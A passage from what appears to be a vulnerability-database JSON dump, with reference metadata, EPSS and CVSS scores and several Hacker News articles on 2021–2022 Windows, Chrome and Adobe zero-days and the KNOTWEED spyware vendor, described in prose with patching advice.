"NONE"}, "backreferences": {"references": [{"type": "adobe", "idList": ["APSB21-29"]}, {"type": "archlinux", "idList": ["ASA-202104-5", "ASA-202104-7"]}, {"type": "attackerkb", "idList": ["AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "AKB:132606CF-7B8C-4EE8-BE1C-308811E7B813", "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "AKB:19A3B42A-68BD-48E1-847B-9BA88408EF2B", "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "AKB:50EC30BE-5E8C-4158-8AA0-06397441F8A5", "AKB:86197DAF-4CA4-4CD7-B1A5-5F00DE015C96", "AKB:DBAEA288-D224-49E1-877D-628DFD1CF161"]}, {"type": "avleonov", "idList": ["AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0278", "CPAI-2021-0314", "CPAI-2021-0316", "CPAI-2021-0317", "CPAI-2021-0318", "CPAI-2021-0381", "CPAI-2021-0485"]}, {"type": "chrome", "idList": ["GCSA-1247606144415232205"]}, {"type": "cve", "idList": ["CVE-2021-21224", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31963", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4906-1:4BE22"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-21224"]}, {"type": "fedora", "idList": ["FEDORA:993DD30E4796", "FEDORA:B4C4A30D8539", "FEDORA:D63AA304E89C"]}, {"type": "freebsd", "idList": ["CB13A765-A277-11EB-97A0-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202104-08"]}, {"type": "githubexploit", "idList": ["399B15EF-A742-5722-86D2-59F3580C307B", "CAE25BF5-2DB9-5000-8FF9-CC2EAA626ECE"]}, {"type": "kaspersky", "idList": ["KLA12147", "KLA12153", "KLA12197", "KLA12198", "KLA12201", "KLA12202"]}, {"type": "krebs", "idList": ["KREBS:E374075CAB55D7AB06EBD73CB87D33CD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ACROBAT-CVE-2021-28550/", "MSF:ILITIES/ACROBAT-CVE-2021-28562/", "MSF:ILITIES/FOXIT_READER-CVE-2019-5131/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21224", "MS:CVE-2021-31199", "MS:CVE-2021-31201", "MS:CVE-2021-31955", "MS:CVE-2021-31956", "MS:CVE-2021-31963", "MS:CVE-2021-31968", "MS:CVE-2021-31985", "MS:CVE-2021-33739", "MS:CVE-2021-33742"]}, {"type": "mskb", "idList": ["KB4011698"]}, {"type": "nessus", "idList": ["ADOBE_ACROBAT_APSB21-29.NASL", "ADOBE_READER_APSB21-29.NASL", "DEBIAN_DSA-4906.NASL", "FREEBSD_PKG_CB13A765A27711EB97A0E09467587C17.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_90_0_4430_85.NASL", "MACOSX_GOOGLE_CHROME_90_0_4430_85.NASL", "MACOS_ADOBE_ACROBAT_APSB21-29.NASL", "MICROSOFT_EDGE_CHROMIUM_90_0_818_46.NASL", "OPENSUSE-2021-629.NASL", "OPENSUSE-2021-712.NASL", "SMB_NT_MS21_JUNE_FEP.NASL", "SMB_NT_MS21_JUNE_WIN_DEFENDER.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:8E9198BF0E389572981DD1AA05D0708A"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0629-1", "OPENSUSE-SU-2021:0712-1"]}, {"type": "thn", "idList": ["THN:1DDE95EA33D4D9F304973569FC787451", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:8243BE07E124CAD984B8B4895550A7CC", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:FF8DAEC0AE0DDAE827D57407C51BE992"]}, {"type": "threatpost", "idList": ["THREATPOST:474207FB444B779CD6B86ABEA0D24054", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:EED27183B3F49112A9E785EA56534781"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21224"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-21224", "epss": "0.969350000", "percentile": "0.994990000", "modified": "2023-03-17"}, {"cve": "CVE-2021-28550", "epss": "0.713430000", "percentile": "0.974580000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31199", "epss": "0.000490000", "percentile": "0.154190000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31201", "epss": "0.000490000", "percentile": "0.154190000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31955", "epss": "0.973570000", "percentile": "0.997920000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31956", "epss": "0.001660000", "percentile": "0.516220000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31963", "epss": "0.019960000", "percentile": "0.870330000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31968", "epss": "0.001270000", "percentile": "0.457470000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31985", "epss": "0.041500000", "percentile": "0.908430000", "modified": "2023-03-17"}, {"cve": "CVE-2021-33739", "epss": "0.000860000", "percentile": "0.345970000", "modified": "2023-03-17"}, {"cve": "CVE-2021-33742", "epss": "0.822710000", "percentile": "0.977990000", "modified": "2023-03-17"}], "vulnersScore": 0.7}, "_state": {"dependencies": 1678920471, "score": 1678921101, "epss": 1679073339}, "_internal": {"score_hash": "dba7757594fe9aa2f38d42e39dc98dd4"}}

{"thn": [{"lastseen": "2022-05-09T12:37:59", "description": "[![Update Windows Systems](https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s728-e1000/microsoft-windows-update.jpg)](<https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. The vulnerabilities that being actively exploited are listed below -\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * [**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis [credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": "https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-29T03:59:29", "description": "[![Windows and Adobe Zero-Days](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjRrnxKtJzXQbaLrPRY2GEIij8so07HImMs9wbPTTP-j92ED6wxTFv-NdQyw_Z0JBlqIYh-H3g2WKAcIkt70zKcB5AxP9KcQgCqChBwNsYPu9CQ_Xp6uBmkhxyoNZpHZIIQrV5TkreAFNBg-kFpOzjxBYxhl5bZqKZH6j9zgyd3itncGVyM5L09fy-c/s728-e1000/windows-hacker.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjRrnxKtJzXQbaLrPRY2GEIij8so07HImMs9wbPTTP-j92ED6wxTFv-NdQyw_Z0JBlqIYh-H3g2WKAcIkt70zKcB5AxP9KcQgCqChBwNsYPu9CQ_Xp6uBmkhxyoNZpHZIIQrV5TkreAFNBg-kFpOzjxBYxhl5bZqKZH6j9zgyd3itncGVyM5L09fy-c/s728-e100/windows-hacker.jpg>)\n\nA cyber mercenary that \"ostensibly sells general security and information analysis services to commercial customers\" used several Windows and Adobe zero-day exploits in limited and highly-targeted attacks against European and Central American entities.\n\nThe company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called [DSIRF](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) that's linked to the development and attempted sale of a piece of cyberweapon referred to as **Subzero**, which can be used to hack targets' phones, computers, and internet-connected devices.\n\n\"Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama,\" the tech giant's cybersecurity teams [said](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) in a Wednesday report.\n\nMicrosoft is [tracking](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>) the actor under the moniker KNOTWEED, continuing its trend of terming PSOAs using names given to trees and shrubs. The company previously designated the name [SOURGUM](<https://thehackernews.com/2021/07/israeli-firm-helped-governments-target.html>) to Israeli spyware vendor Candiru.\n\nKNOTWEED is known to dabble in both access-as-a-service and [hack-for-hire](<https://thehackernews.com/2022/06/google-blocks-dozens-of-malicious.html>) operations, offering its toolset to third parties as well as directly associating itself in certain attacks.\n\nWhile the former entails the sales of end-to-end hacking tools that can be used by the purchaser in their own operations without the involvement of the offensive actor, hack-for-hire groups run the targeted operations on behalf of their clients.\n\nThe deployment of Subzero is said to have transpired through the exploitation of numerous issues, including an attack chain that abused an unknown Adobe Reader remote code execution (RCE) flaw and a zero-day privilege escalation bug ([CVE-2022-22047](<https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html>)), the latter of which was addressed by Microsoft as part of its July Patch Tuesday updates.\n\n\"The exploits were packaged into a PDF document that was sent to the victim via email,\" Microsoft explained. \"CVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes and achieve system-level code execution.\"\n\nSimilar attack chains observed in 2021 leveraged a combination of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) in conjunction with an Adobe reader flaw (CVE-2021-28550). The three vulnerabilities were [resolved](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) in June 2021.\n\nThe deployment of Subzero subsequently occurred through a fourth exploit, this time taking advantage of a privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>)), which was closed by Microsoft in August 2021.\n\nBeyond these exploit chains, Excel files masquerading as real estate documents have been used as a conduit to deliver the malware, with the files containing [Excel 4.0 macros](<https://thehackernews.com/2022/01/emotet-now-using-unconventional-ip.html>) designed to kick-start the infection process.\n\nRegardless of the method employed, the intrusions culminate in the execution of shellcode, which is used to retrieve a second-stage payload called Corelump from a remote server in the form of a JPEG image that also embeds a loader named Jumplump that, in turn, loads Corelump into memory.\n\nThe evasive implant comes with a wide range of capabilities, including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from the remote server.\n\nAlso deployed during the attacks were bespoke utilities like Mex, a command-line tool to run open source security software like Chisel, and PassLib, a tool to dump credentials from web browsers, email clients, and the Windows credential manager.\n\nMicrosoft said it uncovered KNOTWEED actively serving malware since February 2020 through infrastructure hosted on DigitalOcean and Choopa, alongside identifying subdomains that are used for malware development, debugging Mex, and staging the Subzero payload.\n\nMultiple links have also been unearthed between DSIRF and the malicious tools used in KNOTWEED's attacks.\n\n\"These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF,\" Redmond noted.\n\nSubzero is no different from off-the-shelf malware such as [Pegasus](<https://thehackernews.com/2022/07/pegasus-spyware-used-to-hack-devices-of.html>), [Predator](<https://thehackernews.com/2022/05/cytroxs-predator-spyware-target-android.html>), [Hermit](<https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html>), and [DevilsTongue](<https://thehackernews.com/2022/07/candiru-spyware-caught-exploiting.html>), which are capable of infiltrating phones and Windows machines to remotely control the devices and siphon off data, sometimes without requiring the user to click on a malicious link.\n\nIf anything, the latest findings highlight a burgeoning international market for such sophisticated surveillance technologies to carry out targeted attacks aimed at members of civil society.\n\nAlthough companies that sell commercial spyware advertise their wares as a means to tackle serious crimes, evidence gathered so far has found [several instances](<https://thehackernews.com/2022/06/nso-confirms-pegasus-spyware-used-by-at.html>) of these tools being misused by authoritarian governments and private organizations to snoop on human rights advocates, journalists, dissidents, and politicians.\n\nGoogle's Threat Analysis Group (TAG), which is tracking over 30 vendors that hawk exploits or surveillance capabilities to state-sponsored actors, said the booming ecosystem underscores \"the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.\"\n\n\"These vendors operate with deep technical expertise to develop and operationalize exploits,\" TAG's Shane Huntley [said](<https://blog.google/threat-analysis-group/googles-efforts-to-identify-and-counter-spyware/>) in a testimony to the U.S. House Intelligence Committee on Wednesday, adding, \"its use is growing, fueled by demand from governments.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-28T11:18:00", "type": "thn", "title": "Microsoft Uncovers Austrian Company Exploiting Windows and Adobe Zero-Day Exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-22047"], "modified": "2022-07-29T02:58:07", "id": "THN:DFA2CC41C78DFA4BED87B1410C21CE2A", "href": "https://thehackernews.com/2022/07/microsoft-uncover-austrian-company.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:58", "description": "[![](https://thehackernews.com/images/--v2cn8JGV00/YMGRd9cFvrI/AAAAAAAACz4/i5Stk6m4GEgwbul82T6lZeEbdMMNfofJQCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg)](<https://thehackernews.com/images/--v2cn8JGV00/YMGRd9cFvrI/AAAAAAAACz4/i5Stk6m4GEgwbul82T6lZeEbdMMNfofJQCLcBGAsYHQ/s0/chrome-zero-day-vulnerability.jpg>)\n\nAttention readers, if you are using Google Chrome browser on your Windows, Mac, or Linux computers, you need to update it immediately to the latest version Google released earlier today.\n\nThe internet services company has rolled out an urgent update to the browser to address 14 newly discovered security issues, including a zero-day flaw that it says is being actively exploited in the wild.\n\nTracked as [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html>), the vulnerability stems from a type confusion issue in its V8 open-source and JavaScript engine. Sergei Glazunov of Google Project Zero has been credited with discovering and reporting the flaw.\n\nAlthough the search giant's Chrome team issued a terse statement acknowledging \"an exploit for CVE-2021-30551 exists in the wild,\" Shane Huntley, Director of Google's Threat Analysis Group, [hinted](<https://twitter.com/ShaneHuntley/status/1402712986289016835>) that the vulnerability was leveraged by the same actor that abused [CVE-2021-33742](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>), an actively exploited remote code execution flaw in Windows MSHTML platform that was addressed by Microsoft as part of its Patch Tuesday update on June 8.\n\n[![](https://thehackernews.com/images/-XI4fkisfDp0/YMGPq0RtpKI/AAAAAAAACzw/d0mpshr20nw2j--sOXxBrrTJIj2IP95ewCLcBGAsYHQ/s0/chrome-zero-day.jpg)](<https://thehackernews.com/images/-XI4fkisfDp0/YMGPq0RtpKI/AAAAAAAACzw/d0mpshr20nw2j--sOXxBrrTJIj2IP95ewCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nThe two zero-days are said to have been provided by a commercial exploit broker to a nation-state actor, which used them in limited attacks against targets in Eastern Europe and the Middle East, Huntley said.\n\nMore technical details about the nature of the attacks are to be released in the coming weeks so as to allow a majority of the users to install the update and prevent other threat actors from creating exploits targeting the flaw.\n\nWith the latest fix, Google has addressed a total of seven zero-days in Chrome since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n\nChrome users can update to the latest version (91.0.4472.101) by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T04:14:00", "type": "thn", "title": "New Chrome 0-Day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-06-10T10:25:50", "id": "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "href": "https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:03", "description": "[![](https://thehackernews.com/images/-pHacbifc0bM/YJtLaUVqNrI/AAAAAAAAChE/JQZWUxanHVEGGJy94zJWtnW3s6teGne7ACLcBGAsYHQ/s0/adobe.jpg)](<https://thehackernews.com/images/-pHacbifc0bM/YJtLaUVqNrI/AAAAAAAAChE/JQZWUxanHVEGGJy94zJWtnW3s6teGne7ACLcBGAsYHQ/s0/adobe.jpg>)\n\nAdobe has released [Patch Tuesday updates](<https://helpx.adobe.com/security.html>) for the month of May with fixes for multiple vulnerabilities spanning 12 different products, including a zero-day flaw affecting Adobe Reader that's actively exploited in the wild.\n\nThe list of updated applications includes [Adobe Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb21-15.html>), [Adobe InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>), [Adobe Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>), [Adobe InCopy](<https://helpx.adobe.com/security/products/incopy/apsb21-25.html>), [Adobe Genuine Service](<https://helpx.adobe.com/security/products/integrity_service/apsb21-27.html>), Adobe Acrobat and Reader, [Magento](<https://helpx.adobe.com/security/products/magento/apsb21-30.html>), Adobe [Creative Cloud Desktop](<https://helpx.adobe.com/security/products/creative-cloud/apsb21-31.html>) Application, Adobe [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>), Adobe [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb21-33.html>), Adobe Medium, and Adobe Animate.\n\nIn a security bulletin, the company [acknowledged](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>) it received reports that the flaw \"has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\" Tracked as CVE-2021-28550, the zero-day concerns an arbitrary code execution flaw that could allow adversaries to execute virtually any command on target systems.\n\n[![](https://thehackernews.com/images/-bGxPAhAwfTI/YJtpVB2NOSI/AAAAAAAAChM/kjgbRzSnNbkEbGKd5h6QkhcEM_bQMjrdgCLcBGAsYHQ/s0/adobe.jpg)](<https://thehackernews.com/images/-bGxPAhAwfTI/YJtpVB2NOSI/AAAAAAAAChM/kjgbRzSnNbkEbGKd5h6QkhcEM_bQMjrdgCLcBGAsYHQ/s0/adobe.jpg>)\n\nWhile the targeted attacks took aim at Windows users of Adobe Reader, the issue affects both Windows and macOS versions of Acrobat DC, Acrobat Reader DC, Acrobat 2020, Acrobat Reader 2020, Acrobat 2017, and Acrobat Reader 2017. An anonymous researcher has been credited with reporting the vulnerability.\n\n10 critical and four important vulnerabilities were addressed in Adobe Acrobat and Reader, followed by remediation for five critical flaws (CVE-2021-21101-CVE-2021-21105) in Adobe Illustrator that could lead to arbitrary code execution in the context of the current user. Adobe credited Kushal Arvind Shah of Fortinet's FortiGuard Labs with reporting three of the five vulnerabilities.\n\nIn all, a total of 43 security weaknesses have been resolved in Tuesday's update. Users are advised to update their software installations to the latest versions to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 